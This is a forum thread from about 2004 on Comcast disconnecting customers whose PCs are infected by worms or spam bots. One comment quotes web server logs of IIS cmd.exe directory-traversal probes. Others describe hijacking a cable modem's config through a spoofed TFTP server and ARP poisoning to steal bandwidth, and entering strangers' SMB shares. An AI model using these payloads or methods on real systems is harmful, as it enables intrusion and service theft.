Comcast Cuts Infected PCs' Network Connections

fidget42 writes "I just noticed this article over at Infoworld. It seems that Comcast is finally doing something about the machines on their network that are being used by spammers. They are now cutting off service to those customers who have computers that have been hijacked by spammers. Now, if only other broadband ISPs would start policing their user base ..."

Cox does this...

[h0mer]

I know anecdotal evidence is pretty much worthless, but my friend got infected with all sorts of nasty ad/malwares, along with Blaster and a couple other worms. Cox deactivated his cable modem, he had to call them and go through phone hell to get his service back. So I'm not really sure it's only Comcast doing this.

Happened to me.

[Anonymous Coward]

I had a machine on AT&T (now Comcast) that was infected by a worm. Bummer. I'll tell you, you have to keep up with those service packs even if you're going to directly connect to the network for "just a few hours".

Anyhow, my friends at AT&T Broadband (the ones that never answered their phone) sent me a nastygram telling me that I was doing a bit too much port scanning for their liking (duh...)

So I ripped the machine of the network and poked around. Yep, it turned out that my machine was infected a few hours after I installed the OS, and it was doing it's bad thing for WEEKS.

At the time, AT&T just "informed me" that I should stop doing bad things. I think it would have been prudent for them to kill my service until I took corrective action.

Of course, this was 3 years ago or so... a more innocent time...

Re:Is this right?

[Depili]

Well, many finnish ISPs offer bundle deals on AV and firewall software with their connections, and atleast the campus network of Helsinki University of Technics cuts infected machines. [www.hut.fi] And IMO cutting spam drones is the right thing to do, but determinating what is infected and what ain't can be little tricky at times.

Comcast Terms Of Service / Acceptable Use Policy

[SignalFreq]

Here [comcast.net] is Comcast's Terms Of Service.

From the AUP:
Note: Comcast reserves the right to immediately terminate the Service and the Subscriber Agreement if you engage in any of the prohibited activities listed in this AUP or if you use the Comcast Equipment or Service in a way which is contrary to any Comcast policies or any of Comcast's suppliers' policies. You must strictly adhere to any policy set forth by another service provider accessed through the Service.

So they can terminate service, based on violation of the subarticles:

(vii) restrict, inhibit, or otherwise interfere with the ability of any other person, regardless of intent, purpose or knowledge, to use or enjoy the Service, including, without limitation, posting or transmitting any information or software which contains a worm, virus, or other harmful feature, or generating levels of traffic sufficient to impede others' ability to send or retrieve information;

And transmitting a virus is definitely a violation. Still, it would be nice if there was more information on what will cause them to pull the plug.

Re:Other ISPs start to do this?

[mikeophile]

Take a look at this site [netwide.net] and you will be able to imagine it quite easily.

Doesn't just apply to viruses...

[Xystance]

Oh come on now...

As much as I love OS X (sitting on it right now), it is not "infection-proof".

BSD/OS X is just as vulnerable to hacking as any other Unix system if left unpatched and unmaintained.

Just because there hasn't been a working worm written for BSD/OS X doesn't mean there won't be one.

PLUS, -just- having an updated AntiVirus doesn't solve the problem! It's the patch level too, it's the non-configured software or hardware firewalls, it's the complete dearth of knowledge of the basics of computer security! Everyone has to learn to drive, so everyone has to learn to keep things at a baseline level of security.

Why don't you do your part and instead of calling people stupid, educate those you know, and tell them to educate others?

Re:Nice but...

[Flashbak]

Why would you need to send test email, be they viruses or spam, via your isp's network? If you need to test filters or anti-virus configuration on your mail server do it locally - surely that's the responsible thing to do. I wouldn't want to propogate a virus even the eicar test virus outside of the networks I directly control. (Yes, I'm well aware the eicar test is benign, but that's not the point.)

Re:Nice but...

[caino59]

this is for the people's machines that are constantly trying to hit other machines and infect them....

you know, where you see stuff like this recurring in your web server's logs...offending ip removed...

.client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 332

.client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 332

.client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

.client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

.client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

.client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 302 376

.client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 302 376

.client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

.client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

.client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

.client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

.client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

.client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

.client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

.client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+d ir HTTP/1.0" 302 356

.client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

the people they are cutting off are sending out daily attacks to multiple machines, not just once or twice sending out crap here and there. i think you'll be ok.

Re:Or maybe...

[Chalybeous]

Grandparent has a fair point, but parent reflects the situation where I am.
I use my university's network for internet access, paying UK60 a year for access in my room. At the start of the year there were a lot of virus-related problems, mostly people bringing machines in from home and plugging them in without a firewall or AV software.
Network Services don't insist on this. They don't insist on a virus scan first. What they DO do is cut you off if your PC is causing a nuisance to the network, because they're only three men taking care of the main servers and staff terminals (public terminals are someone else's responsibility).
A lot of people whine about it, but IMHO it's fair policy. They're busy enough without having to help the blissfully clueless. That said, it wouldn't kill them if your 60 included a CD with, say, ZoneAlarm and AVG on... (I distributed similar CDs to friends, with Mozilla Firebird, just so they didn't pick up anything nasty.)

The moral of the story: well, there are two. The first is "You're paying us for the service, not for us to hold your hand and show you how to use your computer." The second is that some people really need to be beaten around the head with a clue-by-four.

Adelphia

[Anonymous Coward]

The ISP I work for (Adelphia, thus Anon :) ) is working on a way to handle customers like these.

-First, the customer is identified, then placed into a 'walled zone'.
-This walled zone will route/allow the cable modem to go only to one specific location, a certain web page in this case.
-Said web page will include downloads for virus fixes and such. Customer goes there, downloads, and cleans up his computer.
-When it has been verified that the customer has gone there and cleaned up, they check his system, then reactivate his account.

To me it seems like a pretty nifty way of stopping virus spreading while keeping the customer informed of what's going on.

We do this

[PhraudulentOne]

I administer a large DSL/dialup userbase and I monitor upstream bandwidth as much as I can. If I notice a DSL customer that has 100% of their upstream bandwidth used I usually check the traffic to see if its email. I will notify the customer and give them a day or two to rectify the problem. If the problem is not fixed within 48 hours I will disable that PVC which will effectively drop sync from the users modem. When the customer comes home, they are now forced to fix the problem. I try to explain to them as politely as possible that they are contributing to the junk mail problem that they are always complaining about and that we had to disable their connection to prevent this. Most people understand and the lack of internet connection gives them the initiative to get up and go purchase some AV software and to run Spybot or some similar program. They phone back once their computer is clean and I turn the circuit back on.

Re:DHCP message? Since when?

[roystgnr]

Frankly those users have ignored all the obvious aspects of being infected (100% cable light flashing)

My cable light has been flashing intermittently ever since the latest Windows worm. It's not because my (Fedora Linux) computer is infected, it's because every other infected computer on the net is periodically scanning my entire block of IP addresses. Every time they try to infect an unused address in that block, our helpful routers send an ARP packet to every cable modem user. I've seen more than a hundred per second during bad periods.

Maybe DSL users (who don't have to share the same bandwidth with everyone in their neighborhood) or users at smarter cable modem companies (who could be caching these things a bit longer, not sending out ARP requests for the same IP address every few seconds) would see a difference if they were infected by a virus, but at least Road Runner Austin users are probably all used to constantly flickering cable modem lights by now.

Re:Other ISPs start to do this?

[andy landy]

Some ISPs worth their salt do this already. I had a mate (who uses the same ISP that I do) and got disconnected as one of his housemates got a spam-relay trojan.

They had no hesitation reconnecting him once he'd fixed the problem, but the fact is that they noticed and acted.

The ISP in question is Eclipse Networking (UK) who are a really good ADSL supplier. (I've got 8 public IPs and reverse-DNS)

It would be good if more ISPs took the time to sort this stuff out, often it's people who don't even know their machine has been hijacked.

Re:Other ISPs start to do this?

[drinkypoo]

Unless you have supplied the cable modem, this only works when your cable provider is stupid. I worked for Cisco (interesting that their name crops up so many times on that page) and I happen to know that as they shipped the software to their licensees (among them sony and samsung) it looks for a configuration file only on the cable interface, and never on the ethernet, so in order to hijack the modem you would need your own cable head end (cisco calls them a uBR) and an up-converter, and you would have to hook it up to that head end at least every time you started it up.

Now, most cable modems have solder pads for a diagnostic connector, which is usually a 3 wire RS-232 serial connection. Sometimes it uses an unusual voltage, and you need a little box to change the levels. If you got access to the diagnostic connector, and your modem had the proper flash image in it, then you could program it through the diagnostic interface.

I can imagine that some modems you purchase from Fry's or what have you will look for config on ethernet, though I doubt many of them do.

For more insight on why this typically won't work, the default route on the device typically points to the cable interface, or does not exist if the cable interface is not hot, and the device has two modes of operation with regard to IP addresses on the internal interface; either it sets itself to 192.168.100.1, or it sets itself to whatever the config file tells it, and it starts proxying DHCP requests. Either way it is not going to be able to find your bogus TFTP server on the network unless it is badly misconfigured to begin with.

Re:Plot by virus scan companies?

[drinkypoo]

NAV didn't protect people from Novarg A anyway, what is forcing people to install it supposed to accomplish?

My experience with this

[MobyDisk]

The problem here is that Comcast is doing shutting down people's connections with no recourse to find out why or to re-enable it.

I received an email and an automated phone call from Comcast stating that I had an infected computer and I must clean it up. I was immediately pleased that they noticed, but frustrated that I could be infected. 5 PCs with varying OSs, all with firewalls and/or antivirus software, so I thought it was unlikely but possible. After doing a full scan I found no viruses.

So I called Comcast's 800 number. They said I need to call a different long-distance number. That number is an automated system with nothing but dead ends. If I select the option about "Viruses and spam emails" then it tells me to email abuse at comcast.net if I get a bad email. But I don't want to report a spam, I received a report. All the options did approximately the same thing: Told me something I already know then hung up. Several calls later, I used the "leave a message" option. A week goes by and I received no call back. I replied to the email but received no response. Nobody on the service number would talk to me about it.

So I receive another email telling me that my service may be disabled if I don't fix the problem. So what do I do now?

To top it off, this isn't the first time. About 8 months ago, Comcast calle and told me I was reported for sending spam. When the read me part of the SpamCop report (which they refused to do many times) it turned out to be a SpamCop report that my roommate made! We _reported_ the spam, we didn't _send_ it! After much arguing, the guy finally got it and left us alone. Mistakes happen, but what irks me the most is that they wanted to tell me I sent a spam, and make sure I corrected my behavior, but refused to tell me the source of the report, or what the email was, or when it was sent, or anything!

Below is the email Comcast sent me. It looks like a form email, with no specific statement about what went wrong.

***PLEASE READ FULLY***

Comcast has received complaints about your computer. We believe it may be:

* Infected with a virus

* Sending "spam" email that you are unaware of

* Allowing spammers to use your connection to send their spam

* Trying to infect other computers on the Internet with viruses

The health of your computer is your responsibility. Consult your computer's manufacturer if you are unable to remedy the situation.

***************
EXPLANATION
***************

This message was sent by the Comcast Network Abuse and Policy Observance Team. We investigate reports of Internet Abuse by our customers. We have received such a report identifying your computer.

The complaint(s) we have received were from other users of the Internet, who are receiving email from you, which they did not request. We understand that you may not be aware of any such email, and you will not see it in your normal email program.

Typically these types of emails are caused, or are allowed to be sent by, viruses. They are either trying to infect other user's computers, or they allow spammers to connect to YOUR computer to send their spam.

If you have anti-virus software on your computer, we recommend visiting the manufacturer's website to update it, as it may be out of date and unable to find the virus that's causing the problem. New viruses come out frequently, so it is important to update the software often, or automatically if possible. We also recommend a security software solution, such as a firewall to further restrict access to your system. Firewalls help to prevent such activity by allowing only the software and transactions that you choose to utilize your Internet connection.

If you are deliberately sending these emails, we ask you to stop. Further complaints will require us to suspend or even terminate your service.

If you have further questions or would like to notif

I work for Comcast

[ironicsky]

I agree with our cut-off policy for people infected with worms. Right now, we're not actually terminating their service, we're just blocking their SMTP and POP access so they cannot transmit viruses. In the rare case, our system will disable a customers account if they are transmitting a virus.

But, users are dumb, and I'll agree with that. Last summer when the blaster worm came out, we emailed out customers ahead of time telling them they need to download the microsoft patch.

On top of that, the Microsoft Windows Update popup that comes up by default, once a week, users still continue to ignore it because they don't know what it does.

Personally, I'd like to see more type of this internet policing by ISP's. They should also be blocking people who have open SMB shares on their Windows Networks. I cant count the number of times I've purposely went in Someones SMB share and dropped a text file telling them how to fix it.

I, however, disagree with the Government policing of the internet. I believe the internet should be policed by the people who pay for it to be there. That would be us and the ISP's

Re:Yes Yes!

[GreyPoopon]

While it is good that Comcast is doing something about the problem, this is a bad solution to the problem.

We as the People-Who-Know need to be spending time helping those who don't to become self-reliant, rather than telling them 'Sorry. You can't access the net until you clean up your system. Sorry, I can't really help you do it. Call someone else.'

Comcast is already doing this. From the article:

"Comcast says that it is aware of the problem, is alerting customers who were hacked and helping them secure their computers."

So, they block their access to trigger the support call, and then help them secure their machine. I think this is the right approach.

Re:Nice but...

[DR SoB]

No it's not, that's some bozo trying to "root" your machine. That's a traverse directory attack they are attempting. It happens all day, every day, and it's NOT what Comcast is going after. Webserver logs show you who is trying to connect to your WEBSITE, it has NOTHING to do with SPAM. If you want to see who these bozo's are just look at the header of your spam email and do a TRACERT (or TRACERTE) to there IP address and see if it's a Comcast subnet (or names resolve...). It may be a cheap virus, it may be some hackers scanning tool, but most Comcast customers are not running old versions of IIS (which is what they are trying to infect by the weblog you posted.).. Check out the Security Focus website for more information..

Re:Bad Idea

[Anonymous Coward]

Comcast already has the infrastructure in place to do something like this. When you first plug your cable modem into their network you are assigned a regular IP address from their DHCP servers. However, DNS is routed to a special registration page where you have to enter your account number and an activation code to register your modem on their network before full connectivity is allowed.

Blues Brothers

[lonesome phreak]

It's a reference to the Blues Brothers, one of the greatest movies ever made. If you haven't seen it then you just don't understand the blues.

Jake: "Hey what's goin' on?"
Cop: "Oh those bums won their court case so they're marching today"
Jake: "What bums?"
Cop: "The fucking Nazi party!"
Jake: "Illinois Nazis"
Elwood: "I hate Illinois Nazis!"

the list of Comcast offenders

[wmt]

http://www.senderbase.org/?searchString=comcast.ne t&searchBy=domain [senderbase.org]

Magnitude 6 = 1 million emails/day

Re:Other ISPs start to do this?

[ookabooka]

I dunno, i hacked my cable modem just through the ethernet port, its a motorola surfboard something (4600? not too sure about the number, not at home). For those of you who are skeptical i will give u a brief overview of what i did. I first found out what the ip was for the TFTP server on comcast for their cfg file something like 10.32.14.1. I then used tftp client on my computer and downloaded their config files and MD5 encryption keys ( i think i had to set my computers ip to that of my cable modem to do it, another 10.32 ip) Then i just set my comp's ip to their tftp servers ip, and set up a tftp server (after modding the config files of course, i had the encryption key in hand, so this wasnt difficult). Rebooted my cable modem using the http interface, about 50% of the time it would correctly load from my tftp, the other 50% from their tftp. Had 1500kb/sec down, 700kb/sec up. . . after about 2 months comcast caught me and gave me slap on the wrist, no job offer though:(, they realzed there was a hog on their network, and checked their modem's config files. . . mine was a tad suspicous :) Everyone i have told this to yells at me for being a liar and that you really cant do it. . .I dont know why it went through the ethernet, but it did, perhaps the newer modems dont, but mine does. I feel like Einstein. . . the universe does too expand.

Getting to the topic, it would be possible for me to write a program to do that all automatically, but it would be extremely ornate, and probably not worth the trouble.

Re:Other ISPs start to do this?

[runderwo]

You can argue from authority all day long, but you're still wrong. The Surfboard series (at least those manufactured up until 2002) were vulnerable to an ARP poisoning attack.

I verified this myself. Set up a TFTP server on an interface with the same IP address as the headend. Then as you reboot the modem, be constantly pinging the modem's HFC IP address through the spoofed interface you created. The cable modem, when it comes up, will then try to TFTP its config file from YOUR machine and not the headend, because you have injected your MAC address into its ARP table for that IP address.

The encryption on the configuration file wasn't a big deal either, because you could get most of the needed information via SNMP IIRC. Most ISPs now disable SNMP and have bots scanning for connections where the actual speed doesn't match the account information.

Re:Yes Yes!

[Anonymous Coward]

Well, this IS insightful, but you were TROLLED. Don't feed the trolls!

Other Companies

[Anonymous Coward]

FYI, I am posting AC for a reason. The company I work for does roll-outs and tech support for small cable companies. Scripts are in place to automatically deactivate accounts with high upload/download bandwidth (meaning trojan p2p programs) and techs monitor e-mail usage. Problem with an account? Notify account holder and de-activate account. If the account holder can't be notified, the account is de-activated anyways.

It's time people start taking responsibility for their actions when using a computer. Computers need to be patched frequently with Windows Update [microsoft.com]. AntiVirus programs such as Norton Antivirus [symantec.com], Mcafee VirusScan [mcafee.com], or Trend Micro PC-Cillin [trendmicro.com] (my personal favorite) are needed with updates and scans run, at the very least, weekly. Computers also need anti-trojan programs such as The Cleaner [moosoft.com] and anti-spyware programs such as Spybot Search & Destroy [safer-networking.org] and Adaware [lavasoft.de]. Even go as far not to use the default Internet programs, Internet Explorer [microsoft.com] and Outlook Express [microsoft.com]. Instead, use free, open source programs such as Mozilla Firefox (browser) [mozilla.org] and Thunderbird (e-mail) [mozilla.org].

Naturally, the majority of people on /. know this, but we need to spread the word.

Re:Cox does this...

[marmstro]

Yup, Cox cut off my cable modem once for having port 25 opened for relay (shame on me, I did a temporary port forwarding to Cox's email server because my normal SMTP server was down, and forgot to un-forward it). I ended up talking to a good tech support person (the good ones are only available after normal business hours) and I fixed the problem, he port scanned me, and turned me back on.

Yahoo gets the prize

[BalloonMan]

I'm a Comcast subscriber and a supporter of DShield, so I have a pretty good idea of the problems at Comcast and I'm glad to see Comcast getting more aggressive about stomping infected machines.

However, SenderBase says Yahoo's 6 MTA's are all in the top 10 senders of e-mail. Only XO Communications and thehdhd.com out-send them. thehdhd.com (at #6) seems to be openly dedicated to producing spam.

So, when will Yahoo clean up its act? Is it even possible for them to take the same kind of stance that Comcast is?

I wish more ISP's would...

[morethanapapercert]

I work tech support for a major cable ISP and my employer, at least DOES police it's customers (albeit with a light hand). There are four basic ways an account gets disabled or throttled. (aside from the obvious non-payment) 1. an e-mail account attempts to send more than a certain, but undisclosed, number of e-mails within a 12 hour period. result : smtp server rejects all further e-mails from source for 24 hours. 2. infected e-mails are traced back to a customers computer. result: customer given a warning e-mail from the security dept and a very short deadline. failure to get cleaned results in ALL internet access being disabled 3. if a customer keeps maxing out bandwidth, the local office has the choice of either dialing down the access or disabling the modem completely 4. if a technician spots the fact that a customers modem is not using a bin file appropriate to the account. ( a fact which can be scanned for automatically with DOCSIS 2.0 compliant modems) When the ISP decides to disable an account, the most common way is indeed to send an updated disabled.bin file to the modem, however, it is possible to "de-provision" a modem. Essentially, the CMTS at the headend gets told that the MAC ID does not have permission to get on the network. One final note, most DOCSIS 2.0 compliant modems, will NOT accept a updated .bin file from the ethernet side....